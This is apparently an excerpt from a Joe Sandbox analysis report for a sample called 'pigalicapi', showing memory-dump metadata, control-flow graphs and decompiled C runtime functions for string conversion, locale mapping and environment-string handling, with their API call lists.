                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                                                                                                                                    • Opcode ID: 559dfc2582458f1c8358301008611393cc9d8105468054c4e5117195227aa444
                                                                                                                                                                                                                                                    • Instruction ID: 44b5dbf1286184cf895e057a9d847ebbd6034b96a735a08f248af040e1bddd01
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 559dfc2582458f1c8358301008611393cc9d8105468054c4e5117195227aa444
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash:
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 0 efc889-efc8a2 1 efc8b8-efc8bd 0->1 2 efc8a4-efc8b4 call efd79e 0->2 4 efc8bf-efc8c7 1->4 5 efc8ca-efc8ee MultiByteToWideChar 1->5 2->1 9 efc8b6 2->9 4->5 7 efc8f4-efc900 5->7 8 efca81-efca94 call efdc5f 5->8 10 efc954 7->10 11 efc902-efc913 7->11 9->1 13 efc956-efc958 10->13 14 efc915-efc924 call efe270 11->14 15 efc932-efc943 call efbd19 11->15 18 efc95e-efc971 MultiByteToWideChar 13->18 19 efca76 13->19 14->19 28 efc92a-efc930 14->28 15->19 25 efc949 15->25 18->19 22 efc977-efc989 call efa9e8 18->22 23 efca78-efca7f call efa61a 19->23 30 efc98e-efc992 22->30 23->8 29 efc94f-efc952 25->29 28->29 29->13 30->19 32 efc998-efc99f 30->32 33 efc9d9-efc9e5 32->33 34 efc9a1-efc9a6 32->34 35 efc9e7-efc9f8 33->35 36 efca31 33->36 34->23 37 efc9ac-efc9ae 34->37 38 efc9fa-efca09 call efe270 35->38 39 efca13-efca24 call efbd19 35->39 40 efca33-efca35 36->40 37->19 41 efc9b4-efc9ce call efa9e8 37->41 44 efca6f-efca75 call efa61a 38->44 54 efca0b-efca11 38->54 39->44 56 efca26 39->56 40->44 45 efca37-efca50 call efa9e8 40->45 41->23 53 efc9d4 41->53 44->19 45->44 57 efca52-efca59 45->57 53->19 58 efca2c-efca2f 54->58 56->58 59 efca5b-efca5c 57->59 60 efca95-efca9b 57->60 58->40 61 efca5d-efca6d WideCharToMultiByte 59->61 60->61 61->44 62 efca9d-efcaa4 call efa61a 61->62 62->23
                                                                                                                                                                                                                                                    C-Code - Quality: 65%
                                                                                                                                                                                                                                                    			E00EFC889(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				int _v12;
                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                    				signed int _t49;
                                                                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                                                                    				int _t58;
                                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                                    				short* _t62;
                                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                                    				short* _t70;
                                                                                                                                                                                                                                                    				int _t71;
                                                                                                                                                                                                                                                    				int _t78;
                                                                                                                                                                                                                                                    				short* _t81;
                                                                                                                                                                                                                                                    				signed int _t87;
                                                                                                                                                                                                                                                    				signed int _t90;
                                                                                                                                                                                                                                                    				void* _t95;
                                                                                                                                                                                                                                                    				void* _t96;
                                                                                                                                                                                                                                                    				int _t98;
                                                                                                                                                                                                                                                    				short* _t101;
                                                                                                                                                                                                                                                    				int _t103;
                                                                                                                                                                                                                                                    				signed int _t106;
                                                                                                                                                                                                                                                    				short* _t107;
                                                                                                                                                                                                                                                    				void* _t110;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                    				_t49 =  *0xf8dd74; // 0x3af7f1ec
                                                                                                                                                                                                                                                    				_v8 = _t49 ^ _t106;
                                                                                                                                                                                                                                                    				_push(__esi);
                                                                                                                                                                                                                                                    				_t103 = _a20;
                                                                                                                                                                                                                                                    				if(_t103 > 0) {
                                                                                                                                                                                                                                                    					_t78 = E00EFD79E(_a16, _t103);
                                                                                                                                                                                                                                                    					_t110 = _t78 - _t103;
                                                                                                                                                                                                                                                    					_t4 = _t78 + 1; // 0x1
                                                                                                                                                                                                                                                    					_t103 = _t4;
                                                                                                                                                                                                                                                    					if(_t110 >= 0) {
                                                                                                                                                                                                                                                    						_t103 = _t78;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t98 = _a32;
                                                                                                                                                                                                                                                    				if(_t98 == 0) {
                                                                                                                                                                                                                                                    					_t98 =  *( *_a4 + 8);
                                                                                                                                                                                                                                                    					_a32 = _t98;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
                                                                                                                                                                                                                                                    				_v12 = _t54;
                                                                                                                                                                                                                                                    				if(_t54 == 0) {
                                                                                                                                                                                                                                                    					L38:
                                                                                                                                                                                                                                                    					return E00EFDC5F(_v8 ^ _t106);
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t95 = _t54 + _t54;
                                                                                                                                                                                                                                                    					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                    					if((_t95 + 0x00000008 & _t54) == 0) {
                                                                                                                                                                                                                                                    						_t81 = 0;
                                                                                                                                                                                                                                                    						__eflags = 0;
                                                                                                                                                                                                                                                    						L14:
                                                                                                                                                                                                                                                    						if(_t81 == 0) {
                                                                                                                                                                                                                                                    							L36:
                                                                                                                                                                                                                                                    							_t105 = 0;
                                                                                                                                                                                                                                                    							L37:
                                                                                                                                                                                                                                                    							E00EFA61A(_t81);
                                                                                                                                                                                                                                                    							goto L38;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
                                                                                                                                                                                                                                                    						_t121 = _t58;
                                                                                                                                                                                                                                                    						if(_t58 == 0) {
                                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t100 = _v12;
                                                                                                                                                                                                                                                    						_t60 = E00EFA9E8(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                    						_t105 = _t60;
                                                                                                                                                                                                                                                    						if(_t105 == 0) {
                                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						if((_a12 & 0x00000400) == 0) {
                                                                                                                                                                                                                                                    							_t96 = _t105 + _t105;
                                                                                                                                                                                                                                                    							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                    							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                    							asm("sbb eax, eax");
                                                                                                                                                                                                                                                    							__eflags = _t87 & _t60;
                                                                                                                                                                                                                                                    							if((_t87 & _t60) == 0) {
                                                                                                                                                                                                                                                    								_t101 = 0;
                                                                                                                                                                                                                                                    								__eflags = 0;
                                                                                                                                                                                                                                                    								L30:
                                                                                                                                                                                                                                                    								__eflags = _t101;
                                                                                                                                                                                                                                                    								if(__eflags == 0) {
                                                                                                                                                                                                                                                    									L35:
                                                                                                                                                                                                                                                    									E00EFA61A(_t101);
                                                                                                                                                                                                                                                    									goto L36;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t62 = E00EFA9E8(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
                                                                                                                                                                                                                                                    								__eflags = _t62;
                                                                                                                                                                                                                                                    								if(_t62 == 0) {
                                                                                                                                                                                                                                                    									goto L35;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                                                                    								__eflags = _a28;
                                                                                                                                                                                                                                                    								if(_a28 != 0) {
                                                                                                                                                                                                                                                    									_push(_a28);
                                                                                                                                                                                                                                                    									_push(_a24);
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
                                                                                                                                                                                                                                                    								__eflags = _t105;
                                                                                                                                                                                                                                                    								if(_t105 != 0) {
                                                                                                                                                                                                                                                    									E00EFA61A(_t101);
                                                                                                                                                                                                                                                    									goto L37;
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									goto L35;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							_t90 = _t96 + 8;
                                                                                                                                                                                                                                                    							__eflags = _t96 - _t90;
                                                                                                                                                                                                                                                    							asm("sbb eax, eax");
                                                                                                                                                                                                                                                    							_t66 = _t60 & _t90;
                                                                                                                                                                                                                                                    							_t87 = _t96 + 8;
                                                                                                                                                                                                                                                    							__eflags = _t66 - 0x400;
                                                                                                                                                                                                                                                    							if(_t66 > 0x400) {
                                                                                                                                                                                                                                                    								__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                                                                    								_t101 = E00EFBD19(_t87, _t66 & _t87);
                                                                                                                                                                                                                                                    								_pop(_t87);
                                                                                                                                                                                                                                                    								__eflags = _t101;
                                                                                                                                                                                                                                                    								if(_t101 == 0) {
                                                                                                                                                                                                                                                    									goto L35;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    								 *_t101 = 0xdddd;
                                                                                                                                                                                                                                                    								L28:
                                                                                                                                                                                                                                                    								_t101 =  &(_t101[4]);
                                                                                                                                                                                                                                                    								goto L30;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							__eflags = _t96 - _t87;
                                                                                                                                                                                                                                                    							asm("sbb eax, eax");
                                                                                                                                                                                                                                                    							E00EFE270();
                                                                                                                                                                                                                                                    							_t101 = _t107;
                                                                                                                                                                                                                                                    							__eflags = _t101;
                                                                                                                                                                                                                                                    							if(_t101 == 0) {
                                                                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    							 *_t101 = 0xcccc;
                                                                                                                                                                                                                                                    							goto L28;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t70 = _a28;
                                                                                                                                                                                                                                                    						if(_t70 == 0) {
                                                                                                                                                                                                                                                    							goto L37;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t125 = _t105 - _t70;
                                                                                                                                                                                                                                                    						if(_t105 > _t70) {
                                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t71 = E00EFA9E8(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
                                                                                                                                                                                                                                                    						_t105 = _t71;
                                                                                                                                                                                                                                                    						if(_t71 != 0) {
                                                                                                                                                                                                                                                    							goto L37;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                    					_t72 = _t54 & _t95 + 0x00000008;
                                                                                                                                                                                                                                                    					_t85 = _t95 + 8;
                                                                                                                                                                                                                                                    					if((_t54 & _t95 + 0x00000008) > 0x400) {
                                                                                                                                                                                                                                                    						__eflags = _t95 - _t85;
                                                                                                                                                                                                                                                    						asm("sbb eax, eax");
                                                                                                                                                                                                                                                    						_t81 = E00EFBD19(_t85, _t72 & _t85);
                                                                                                                                                                                                                                                    						_pop(_t85);
                                                                                                                                                                                                                                                    						__eflags = _t81;
                                                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                                                    							goto L36;
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						 *_t81 = 0xdddd;
                                                                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                                                                    						_t81 =  &(_t81[4]);
                                                                                                                                                                                                                                                    						goto L14;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					asm("sbb eax, eax");
                                                                                                                                                                                                                                                    					E00EFE270();
                                                                                                                                                                                                                                                    					_t81 = _t107;
                                                                                                                                                                                                                                                    					if(_t81 == 0) {
                                                                                                                                                                                                                                                    						goto L36;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					 *_t81 = 0xcccc;
                                                                                                                                                                                                                                                    					goto L12;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    			}


























                                                                                                                                                                                                                                                    0x00efc88e
                                                                                                                                                                                                                                                    0x00efc88f
                                                                                                                                                                                                                                                    0x00efc890
                                                                                                                                                                                                                                                    0x00efc897
                                                                                                                                                                                                                                                    0x00efc89b
                                                                                                                                                                                                                                                    0x00efc89c
                                                                                                                                                                                                                                                    0x00efc8a2
                                                                                                                                                                                                                                                    0x00efc8a8
                                                                                                                                                                                                                                                    0x00efc8ae
                                                                                                                                                                                                                                                    0x00efc8b1
                                                                                                                                                                                                                                                    0x00efc8b1
                                                                                                                                                                                                                                                    0x00efc8b4
                                                                                                                                                                                                                                                    0x00efc8b6
                                                                                                                                                                                                                                                    0x00efc8b6
                                                                                                                                                                                                                                                    0x00efc8b4
                                                                                                                                                                                                                                                    0x00efc8b8
                                                                                                                                                                                                                                                    0x00efc8bd
                                                                                                                                                                                                                                                    0x00efc8c4
                                                                                                                                                                                                                                                    0x00efc8c7
                                                                                                                                                                                                                                                    0x00efc8c7
                                                                                                                                                                                                                                                    0x00efc8e3
                                                                                                                                                                                                                                                    0x00efc8e9
                                                                                                                                                                                                                                                    0x00efc8ee
                                                                                                                                                                                                                                                    0x00efca81
                                                                                                                                                                                                                                                    0x00efca94
                                                                                                                                                                                                                                                    0x00efc8f4
                                                                                                                                                                                                                                                    0x00efc8f4
                                                                                                                                                                                                                                                    0x00efc8f7
                                                                                                                                                                                                                                                    0x00efc8fc
                                                                                                                                                                                                                                                    0x00efc900
                                                                                                                                                                                                                                                    0x00efc954
                                                                                                                                                                                                                                                    0x00efc954
                                                                                                                                                                                                                                                    0x00efc956
                                                                                                                                                                                                                                                    0x00efc958
                                                                                                                                                                                                                                                    0x00efca76
                                                                                                                                                                                                                                                    0x00efca76
                                                                                                                                                                                                                                                    0x00efca78
                                                                                                                                                                                                                                                    0x00efca79
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efca7f
                                                                                                                                                                                                                                                    0x00efc969
                                                                                                                                                                                                                                                    0x00efc96f
                                                                                                                                                                                                                                                    0x00efc971
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efc977
                                                                                                                                                                                                                                                    0x00efc989
                                                                                                                                                                                                                                                    0x00efc98e
                                                                                                                                                                                                                                                    0x00efc992
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efc99f
                                                                                                                                                                                                                                                    0x00efc9d9
                                                                                                                                                                                                                                                    0x00efc9dc
                                                                                                                                                                                                                                                    0x00efc9df
                                                                                                                                                                                                                                                    0x00efc9e1
                                                                                                                                                                                                                                                    0x00efc9e3
                                                                                                                                                                                                                                                    0x00efc9e5
                                                                                                                                                                                                                                                    0x00efca31
                                                                                                                                                                                                                                                    0x00efca31
                                                                                                                                                                                                                                                    0x00efca33
                                                                                                                                                                                                                                                    0x00efca33
                                                                                                                                                                                                                                                    0x00efca35
                                                                                                                                                                                                                                                    0x00efca6f
                                                                                                                                                                                                                                                    0x00efca70
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efca75
                                                                                                                                                                                                                                                    0x00efca49
                                                                                                                                                                                                                                                    0x00efca4e
                                                                                                                                                                                                                                                    0x00efca50
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efca54
                                                                                                                                                                                                                                                    0x00efca55
                                                                                                                                                                                                                                                    0x00efca56
                                                                                                                                                                                                                                                    0x00efca59
                                                                                                                                                                                                                                                    0x00efca95
                                                                                                                                                                                                                                                    0x00efca98
                                                                                                                                                                                                                                                    0x00efca5b
                                                                                                                                                                                                                                                    0x00efca5b
                                                                                                                                                                                                                                                    0x00efca5c
                                                                                                                                                                                                                                                    0x00efca5c
                                                                                                                                                                                                                                                    0x00efca69
                                                                                                                                                                                                                                                    0x00efca6b
                                                                                                                                                                                                                                                    0x00efca6d
                                                                                                                                                                                                                                                    0x00efca9e
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efca6d
                                                                                                                                                                                                                                                    0x00efc9e7
                                                                                                                                                                                                                                                    0x00efc9ea
                                                                                                                                                                                                                                                    0x00efc9ec
                                                                                                                                                                                                                                                    0x00efc9ee
                                                                                                                                                                                                                                                    0x00efc9f0
                                                                                                                                                                                                                                                    0x00efc9f3
                                                                                                                                                                                                                                                    0x00efc9f8
                                                                                                                                                                                                                                                    0x00efca13
                                                                                                                                                                                                                                                    0x00efca15
                                                                                                                                                                                                                                                    0x00efca1f
                                                                                                                                                                                                                                                    0x00efca21
                                                                                                                                                                                                                                                    0x00efca22
                                                                                                                                                                                                                                                    0x00efca24
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efca26
                                                                                                                                                                                                                                                    0x00efca2c
                                                                                                                                                                                                                                                    0x00efca2c
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efca2c
                                                                                                                                                                                                                                                    0x00efc9fa
                                                                                                                                                                                                                                                    0x00efc9fc
                                                                                                                                                                                                                                                    0x00efca00
                                                                                                                                                                                                                                                    0x00efca05
                                                                                                                                                                                                                                                    0x00efca07
                                                                                                                                                                                                                                                    0x00efca09
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efca0b
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efca0b
                                                                                                                                                                                                                                                    0x00efc9a1
                                                                                                                                                                                                                                                    0x00efc9a6
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efc9ac
                                                                                                                                                                                                                                                    0x00efc9ae
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efc9c5
                                                                                                                                                                                                                                                    0x00efc9ca
                                                                                                                                                                                                                                                    0x00efc9ce
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efc9d4
                                                                                                                                                                                                                                                    0x00efc907
                                                                                                                                                                                                                                                    0x00efc909
                                                                                                                                                                                                                                                    0x00efc90b
                                                                                                                                                                                                                                                    0x00efc913
                                                                                                                                                                                                                                                    0x00efc932
                                                                                                                                                                                                                                                    0x00efc934
                                                                                                                                                                                                                                                    0x00efc93e
                                                                                                                                                                                                                                                    0x00efc940
                                                                                                                                                                                                                                                    0x00efc941
                                                                                                                                                                                                                                                    0x00efc943
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efc949
                                                                                                                                                                                                                                                    0x00efc94f
                                                                                                                                                                                                                                                    0x00efc94f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efc94f
                                                                                                                                                                                                                                                    0x00efc917
                                                                                                                                                                                                                                                    0x00efc91b
                                                                                                                                                                                                                                                    0x00efc920
                                                                                                                                                                                                                                                    0x00efc924
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efc92a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x00efc92a

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00EFCADA,?,?,00000000), ref: 00EFC8E3
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00EFC91B
                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00EFCADA,?,?,00000000,?,?,?), ref: 00EFC969
                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00EFCA00
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00EFCADA,?,?,00000000,?), ref: 00EFCA63
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00EFCA70
                                                                                                                                                                                                                                                      • Part of subcall function 00EFBD19: RtlAllocateHeap.NTDLL(00000000,?,?,?,00EFA5A1,00000000), ref: 00EFBD4B
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00EFCA79
                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 00EFCA9E
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3864826663-0
                                                                                                                                                                                                                                                    • Opcode ID: 6adfcddc621cca56092d3bed1b2b43d3bab1ea06a5057863316094109e5acdfd
                                                                                                                                                                                                                                                    • Instruction ID: b453b8f326b310493d87227d0361a3482bafd47515db35230c72d1cd7bae4f1a
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6adfcddc621cca56092d3bed1b2b43d3bab1ea06a5057863316094109e5acdfd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0F51F27260061EAFEB258E64CD41FBB7BAAEF40754F355629FE09F6140EB74EC408660
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • LCMapStringEx.KERNEL32 ref: 00EFAA3B
                                                                                                                                                                                                                                                    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 00EFAA59
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000003.00000002.858247527.0000000000EF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00EF0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858203754.0000000000EF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.858744722.0000000000F09000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.860024941.0000000000F4C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861275270.0000000000F8D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000003.00000002.861368682.0000000000F8F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_ef0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: String
                                                                                                                                                                                                                                                    • String ID: LCMapStringEx
                                                                                                                                                                                                                                                    • API String ID: 2568140703-3893581201
                                                                                                                                                                                                                                                    • Opcode ID: 199677af55b0bb0cb910ebed09f93e8edf832aaf3e3af10ceb3c8cf18cf1597a
                                                                                                                                                                                                                                                    • Instruction ID: 30791566d2724e21a7ac4b2d63d3aa4d92ed88521a26a3eaa8a704d1071b3fe7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 199677af55b0bb0cb910ebed09f93e8edf832aaf3e3af10ceb3c8cf18cf1597a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6101D77250420DBBCF02AFA0DD05DEE7FA2EF08750F054154BE186A161DB76C971EB91
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E00F01D19(void* __ecx) {
                                                                                                                                                                                                                                                    				void* _t6;
                                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                                    				void* _t18;
                                                                                                                                                                                                                                                    				WCHAR* _t19;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t14 = __ecx;
                                                                                                                                                                                                                                                    				_t19 = GetEnvironmentStringsW();
                                                                                                                                                                                                                                                    				if(_t19 != 0) {
                                                                                                                                                                                                                                                    					_t12 = (E00F01CE2(_t19) - _t19 >> 1) + (E00F01CE2(_t19) - _t19 >> 1);
                                                                                                                                                                                                                                                    					_t6 = E00EFBD19(_t14, (E00F01CE2(_t19) - _t19 >> 1) + (E00F01CE2(_t19) - _t19 >> 1)); // executed
                                                                                                                                                                                                                                                    					_t18 = _t6;
                                                                                                                                                                                                                                                    					if(_t18 != 0) {
                                                                                                                                                                                                                                                    						E00EFEAF0(_t18, _t19, _t12);
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					E00EFA6DA(0);
                                                                                                                                                                                                                                                    					FreeEnvironmentStringsW(_t19);
                                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                                    					_t18 = 0;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				return _t18;
                                                                                                                                                                                                                                                    			}







                                                                                                                                                                                                                                                    0x00f01d19
                                                                                                                                                                                                                                                    0x00f01d23
                                                                                                                                                                                                                                                    0x00f01d27
                                                                                                                                                                                                                                                    0x00f01d38
                                                                                                                                                                                                                                                    0x00f01d3c
                                                                                                                                                                                                                                                    0x00f01d41
                                                                                                                                                                                                                                                    0x00f01d47
                                                                                                                                                                                                                                                    0x00f01d4c
                                                                                                                                                                                                                                                    0x00f01d51
                                                                                                                                                                                                                                                    0x00f01d56
                                                                                                                                                                                                                                                    0x00f01d5d
                                                                                                                                                                                                                                                    0x00f01d29
                                                                                                                                                                                                                                                    0x00f01d29
                                                                                                                                                                                                                                                    0x00f01d29
                                                                                                                                                                                                                                                    0x00f01d68

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetEnvironmentStringsW.KERNEL32 ref: 00F01D1D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00F01D56
